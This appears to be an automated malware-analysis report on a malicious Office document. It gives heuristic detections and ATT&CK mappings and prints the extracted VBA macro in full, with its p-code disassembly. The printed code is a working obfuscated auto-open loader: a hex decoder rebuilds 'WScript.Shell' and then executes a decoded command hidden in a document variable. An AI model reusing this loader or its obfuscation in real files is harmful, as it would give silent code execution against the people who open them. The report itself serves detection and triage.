MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains heavily obfuscated VBA macros, including an Auto_Open subroutine, which is a common loader technique. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates the use of CreateObject and Shell/exec functions to download and execute a second-stage payload. The VBA code attempts to decode a string which likely contains the URL for the payload, but the decoding routine is truncated.
Heuristics 9
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Public Sub Auto_Open() Application.Run "EII_F" End Sub -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Public Sub HA_COQ() Dim BS_KCU As Object: Set BS_KCU = VBA.CreateObject(WKN_J("A09CACBBB2B9BD779CB1AEB5B5")) Dim Z_PEU As String -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Public Sub Document_Open() Application.Run "EII_F" -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() Application.Run "ThisWorkbook.EII_F" -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
End Function Public Sub Auto_Open() Application.Run "EII_F" -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8791 bytes |
SHA-256: 317dab35ea45790c378706238930caa142ae5175f5d73aed629dace12cba4c7b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Function WKN_J(ByVal text As String)
Dim DP_VBZ As String
Dim I_YU As Long
For I_YU = 1 To Len(text) Step 2
DP_VBZ = DP_VBZ & Chr(Asc(Chr("&H" & Mid(text, I_YU, 2))) - 73)
Next
WKN_J = DP_VBZ
End Function
Public Sub Auto_Open()
Application.Run "EII_F"
End Sub
Sub EII_F()
HA_COQ
End Sub
Public Sub Document_Open()
Application.Run "EII_F"
End Sub
Public Sub HA_COQ()
Dim BS_KCU As Object: Set BS_KCU = VBA.CreateObject(WKN_J("A09CACBBB2B9BD779CB1AEB5B5"))
Dim Z_PEU As String
Z_PEU = "88885A886B88A15FA6779688B0AD77EA82889E88B0887791608888888893B65960A888508888C75F8855AF8888876EA4888888788891628C885388885F888888984EA08852A7648788A4889394888870A288968797888E886C58888B88BC884DB488694D88885C889988B388877B4C88888"
Dim Q_G As String
Q_G = "888888C88881F8888BD88AD889E8E88886CB555887488C78872888888888888AD70B7AA899E8858888888885D9CA7919988998888BEC14A818854728888AF8870B088C39A88607788888C88885D7FBA9D9C5588615088B67288928866886AA78888BC8888888881C18F887EB788888888C4"
Dim M_KK As String
M_KK = "A24F58A8885156718588C388886B7D4AAF88D19DAF9788884FC3888868BD88889C88A0889688888888B2B28888745B8288695A885F6F88B78888568866A3C64AB2A388AA618B7688C788888888B0886488AB59B37588798888578898945888888888A46D50889A888888885A7091B46888B"
Dim EDQ_HF As String
EDQ_HF = "58886888779B288675A7788886A826188B38888889B62888888AD558888B48875605D75887A66886B8888C38F8888B188C288BE70AC63C68888BB88A6718088938888565688C5954BA2BA88885188888888B688B84E8888888888708988B08879888988A4AE8888BB8888B088885C885C88"
Dim GKS_H As String
GKS_H = "88886288C7525BA888888862C1938A888863916EBA888880885361BC505C88A388C89E8C808888885088C265AB88896088B9C2A166889090889D888888CC678888889E889588B254AD8891BE88887C88645F888EAAC088885388889F886CA4B9889F8888B26D88885BC288885388BB96888"
Dim T_IIP As String
T_IIP = "8C485AFA95488AD88888888A7884E508876888888A098887F884988C082886D886752889367A6889854A788B0594E888888C5888894575A56A6BB8888728850B888888888AC8888BA889588618888889F88B6797367888877858888A9886EA99FBF888A528888B088766088886888888888"
Dim Y_K As String
Y_K = "9C8485888D88884988AA8888B588C588678888C24C4E88884F7281578F7CA288886DC87A618E528C88888888C575889CB8888881809A9088888863B8888860888863B94FA3887FC38988868888AB888888B1878888887688BB8B88B79E8273AE8858B388B1888888888888524F88AE4A708"
Dim SDI_D As String
SDI_D = "86C9FB6888888C788C655885C6DAA9C6758A4884E8888888888888F885F8888887DC7A688536F8854568888BD5B8861999A88B088889A8888958888888AB7887488678888BA6C88888A888870888877A2885488889A758888AB8BA88888888888888CAE88768D88888895A96D8888887D88"
Dim KBE_KE As String
KBE_KE = "8888BC88888889889E6A887B88A18888C48888526EA1B08888868EB49E88888865886F88B4A2B54C509D8888C2886FAD88B45BB78888BD54888888885E4987888888A98888A66B73884A8888BD5BBA674F88C0885D888F8888B7A88851889D888888B4BF88BA92888888C488885A8857C28"
Dim JC_W As String
JC_W = "85C888862888888888A8858C588AC4F88A85E7688B188B0889288C088738888888885B89AC18888888888C8AB528888547D88AC88607C8D8885885294B38874885F88A98879888888A0BFC44D88C7888888887DC081885173888488C18483AB9D8888889E4D888888888888887B5AA0888888738879A1885F8863B3655D708C8EB5ADBF8882"
BS_KCU.Exec (WKN_J(ActiveDocument.Variables("CU6IW").Value))
End Sub
Sub Workbook_Open()
Application.Run "ThisWorkbook.EII_F"
End Sub
' Processing file: /opt/analyzer/scan_staging/e8e2f2d5f3504a78b48915ff11009dda.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7499 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' FuncDefn (Public Function WKN_J(ByVal Text As String))
' Line #2:
' Dim
' VarDefn DP_VBZ (As String)
' Line #3:
' Dim
' VarDefn I_YU (As Long)
' Line #4:
' StartForVariable
' Ld I_YU
' EndForVariable
' LitDI2 0x0001
' Ld Text
' FnLen
' LitDI2 0x0002
' ForStep
' Line #5:
' Ld DP_VBZ
' LitStr 0x0002 "&H"
' Ld Text
' Ld I_YU
' LitDI2 0x0002
' ArgsLd Mid 0x0003
' Concat
' ArgsLd Chr 0x0001
' ArgsLd Asc 0x0001
' LitDI2 0x0049
' Sub
' ArgsLd Chr 0x0001
' Concat
' St DP_VBZ
' Line #6:
' StartForVariable
' Next
' Line #7:
' Ld DP_VBZ
' St WKN_J
' Line #8:
' EndFunc
' Line #9:
' FuncDefn (Public Sub Auto_Open())
' Line #10:
' LitStr 0x0005 "EII_F"
' Ld Application
' ArgsMemCall Run 0x0001
' Line #11:
' EndSub
' Line #12:
' FuncDefn (Sub EII_F())
' Line #13:
' ArgsCall HA_COQ 0x0000
' Line #14:
' EndSub
' Line #15:
' FuncDefn (Public Sub Document_Open())
' Line #16:
' LitStr 0x0005 "EII_F"
' Ld Application
' ArgsMemCall Run 0x0001
' Line #17:
' EndSub
' Line #18:
' FuncDefn (Public Sub HA_COQ())
' Line #19:
' Dim
' VarDefn BS_KCU (As Object)
' BoS 0x0000
' SetStmt
' LitStr 0x001A "A09CACBBB2B9BD779CB1AEB5B5"
' ArgsLd WKN_J 0x0001
' Ld VBA
' ArgsMemLd CreateObject 0x0001
' Set BS_KCU
' Line #20:
' Dim
' VarDefn Z_PEU (As String)
' Line #21:
' LitStr 0x00E3 "88885A886B88A15FA6779688B0AD77EA82889E88B0887791608888888893B65960A888508888C75F8855AF8888876EA4888888788891628C885388885F888888984EA08852A7648788A4889394888870A288968797888E886C58888B88BC884DB488694D88885C889988B388877B4C88888"
' St Z_PEU
' Line #22:
' Dim
' VarDefn Q_G (As String)
' Line #23:
' LitStr 0x00E3 "888888C88881F8888BD88AD889E8E88886CB555887488C78872888888888888AD70B7AA899E8858888888885D9CA7919988998888BEC14A818854728888AF8870B088C39A88607788888C88885D7FBA9D9C5588615088B67288928866886AA78888BC8888888881C18F887EB788888888C4"
' St Q_G
' Line #24:
' Dim
' VarDefn M_KK (As String)
' Line #25:
' LitStr 0x00E3 "A24F58A8885156718588C388886B7D4AAF88D19DAF9788884FC3888868BD88889C88A0889688888888B2B28888745B8288695A885F6F88B78888568866A3C64AB2A388AA618B7688C788888888B0886488AB59B37588798888578898945888888888A46D50889A888888885A7091B46888B"
' St M_KK
' Line #26:
' Dim
' VarDefn EDQ_HF (As String)
' Line #27:
' LitStr 0x00E3 "58886888779B288675A7788886A826188B38888889B62888888AD558888B48875605D75887A66886B8888C38F8888B188C288BE70AC63C68888BB88A6718088938888565688C5954BA2BA88885188888888B688B84E8888888888708988B08879888988A4AE8888BB8888B088885C885C88"
' St EDQ_HF
' Line #28:
' Dim
' VarDefn GKS_H (As String)
' Line #29:
' LitStr 0x00E3 "88886288C7525BA888888862C1938A888863916EBA888880885361BC505C88A388C89E8C808888885088C265AB88896088B9C2A166889090889D888888CC678888889E889588B254AD8891BE88887C88645F888EAAC088885388889F886CA4B9889F8888B26D88885BC288885388BB96888"
' St GKS_H
' Line #30:
' Dim
' VarDefn T_IIP (As String)
' Line #31:
' LitStr 0x00E3 "8C485AFA95488AD88888888A7884E508876888888A098887F884988C082886D886752889367A6889854A788B0594E888888C5888894575A56A6BB8888728850B888888888AC8888BA889588618888889F88B6797367888877858888A9886EA99FBF888A528888B088766088886888888888"
' St T_IIP
' Line #32:
' Dim
' VarDefn Y_K (As String)
' Line #33:
' LitStr 0x00E3 "9C8485888D88884988AA8888B588C588678888C24C4E88884F7281578F7CA288886DC87A618E528C88888888C575889CB8888881809A9088888863B8888860888863B94FA3887FC38988868888AB888888B1878888887688BB8B88B79E8273AE8858B388B1888888888888524F88AE4A708"
' St Y_K
' Line #34:
' Dim
' VarDefn SDI_D (As String)
' Line #35:
' LitStr 0x00E3 "86C9FB6888888C788C655885C6DAA9C6758A4884E8888888888888F885F8888887DC7A688536F8854568888BD5B8861999A88B088889A8888958888888AB7887488678888BA6C88888A888870888877A2885488889A758888AB8BA88888888888888CAE88768D88888895A96D8888887D88"
' St SDI_D
' Line #36:
' Dim
' VarDefn KBE_KE (As String)
' Line #37:
' LitStr 0x00E3 "8888BC88888889889E6A887B88A18888C48888526EA1B08888868EB49E88888865886F88B4A2B54C509D8888C2886FAD88B45BB78888BD54888888885E4987888888A98888A66B73884A8888BD5BBA674F88C0885D888F8888B7A88851889D888888B4BF88BA92888888C488885A8857C28"
' St KBE_KE
' Line #38:
' Dim
' VarDefn JC_W (As String)
' Line #39:
' LitStr 0x010B "85C888862888888888A8858C588AC4F88A85E7688B188B0889288C088738888888885B89AC18888888888C8AB528888547D88AC88607C8D8885885294B38874885F88A98879888888A0BFC44D88C7888888887DC081885173888488C18483AB9D8888889E4D888888888888887B5AA0888888738879A1885F8863B3655D708C8EB5ADBF8882"
' St JC_W
' Line #40:
' Line #41:
' LitStr 0x0005 "CU6IW"
' Ld ActiveDocument
' ArgsMemLd Variables 0x0001
' MemLd Value
' ArgsLd WKN_J 0x0001
' Paren
' Ld BS_KCU
' ArgsMemCall Exec 0x0001
' Line #42:
' EndSub
' Line #43:
' FuncDefn (Sub Workbook_Open())
' Line #44:
' LitStr 0x0012 "ThisWorkbook.EII_F"
' Ld Application
' ArgsMemCall Run 0x0001
' Line #45:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.